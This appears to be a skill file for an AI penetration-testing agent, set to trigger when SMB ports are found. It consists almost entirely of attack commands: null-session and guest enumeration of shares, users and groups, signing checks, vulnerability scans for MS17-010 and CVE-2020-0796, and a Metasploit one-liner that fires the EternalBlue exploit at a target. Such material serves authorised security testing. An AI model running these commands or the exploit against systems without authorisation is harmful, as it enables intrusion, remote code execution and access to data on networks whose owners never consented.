| name | svc-smb |
| description | SMB/CIFS attack techniques — null sessions, share enumeration, NTLM relay, EternalBlue, signing checks. Use when SMB is found. Triggers - ports 445/139, netbios, MS17-010 EternalBlue, signing:False, null session, share access, PetitPotam/coerce. |
SMB Attack Reference
Enumeration
enum4linux-ng -A <target>
smbclient -N -L //<target>
crackmapexec smb <target> --shares
crackmapexec smb <target> -u '' -p '' --shares
crackmapexec smb <target> -u 'guest' -p '' --shares
crackmapexec smb <target> --users
rpcclient -U '' -N <target> -c 'enumdomusers'
rpcclient -U '' -N <target> -c 'enumdomgroups'
crackmapexec smb <target>
nmap --script smb-security-mode -p 445 <target>
Null Session Access
smbclient -N //<target>/<share>
smbmap -H <target> -u '' -p ''
rpcclient -U '' -N <target>
Critical Vulnerabilities
nmap --script smb-vuln-ms17-010 -p 445 <target>
msfconsole -q -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS <target>; run"
nmap --script smb-vuln-cve-2020-0796 -p 445 <target>